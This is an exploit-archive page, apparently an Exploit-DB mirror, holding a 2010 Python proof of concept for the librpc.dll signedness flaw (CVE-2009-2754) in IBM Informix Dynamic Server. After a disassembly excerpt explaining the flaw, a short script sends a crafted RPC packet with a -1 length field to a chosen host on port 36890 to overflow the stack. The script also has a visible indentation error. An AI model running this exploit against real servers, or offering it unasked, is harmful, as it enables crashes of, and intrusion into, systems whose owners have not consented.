Skip to content
cyberexploits
dosmultipletext

Multiple Vendor 'librpc.dll' Signedness Error - Remote Code Execution

Multiple Vendor 'librpc.dll' Signedness Error - Remote Code Execution

Publié le 2010-04-08

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/multiple/dos/12109.txt7eac4c3a
raw
# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability

# Date: 2010-04-08

# Author: ZSploit.com

# Software Link: N/A

# Version: N/A

# Tested on: IBM Informix Dynamic Server 10.0

# CVE : CVE-2009-2754



#! /usr/bin/env python

###############################################################################

## File       :  zs_ids_rpc.py

## Description:

##            :

## Created_On :  Mar 21 2010

##

## (c) Copyright 2010, ZSploit.com. all rights reserved.

###############################################################################

"""

The issue in __lgto_svcauth_unix():



.text:1000B8E1                 mov     [ebp+0], eax

.text:1000B8E4                 mov     eax, [ebx]

.text:1000B8E6                 push    eax             ; netlong

.text:1000B8E7                 add     ebx, 4

.text:1000B8EA                 call    esi ; ntohl    ; Get length of hostname

.text:1000B8EC                 cmp     eax, 0FFh    ; Signedness error, if we give 0xffffffff(-1) will pass this check

.text:1000B8F1                 jle     short loc_1000B8FD

.text:1000B8F3                 mov     esi, 1

.text:1000B8F8                 jmp     loc_1000B9D5

.text:1000B8FD ; ---------------------------------------------------------------------------

.text:1000B8FD

.text:1000B8FD loc_1000B8FD:                           ; CODE XREF: __lgto_svcauth_unix+71j

.text:1000B8FD                 mov     edi, [ebp+4]

.text:1000B900                 mov     ecx, eax

.text:1000B902                 mov     edx, ecx

.text:1000B904                 mov     esi, ebx

.text:1000B906                 shr     ecx, 2

.text:1000B909                 rep movsd        ; call memcpy here with user-supplied size cause a stack overflow

.text:1000B90B                 mov     ecx, edx

.text:1000B90D                 add     eax, 3

.text:1000B910                 and     ecx, 3

.text:1000B913                 rep movsb

"""



import sys

import socket



if (len(sys.argv) != 2):

    print "Usage:\t%s [target]" % sys.argv[0]

    sys.exit(0)





data = "\x80\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" \

    "\x00\x01\x86\xb1\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" \

    "\x00\x00\x00\x4c\x00\x00\xd6\x45\xff\xff\xff\xff\x41\x41\x41\x41" \

    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00" \

    "\x00\x00\x00\x00\x00\x00\x00\x0a\x42\x42\x42\x42\x42\x42\x42\x42" \

    "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \

    "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \

    "\x00\x00\x00\x00\x00\x00\x00\x00"



host = sys.argv[1]

port = 36890



print "PoC for ZDI-10-023 by ZSploit.com"

try:

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:

    s.connect((host, port))

        s.send(data)

        print "Sending payload .."

    except:

        print "Error in send"

    print "Done"

except:

    print "Error in socket"



The ZSploit Team

http://zsploit.com



Voir sur GitHub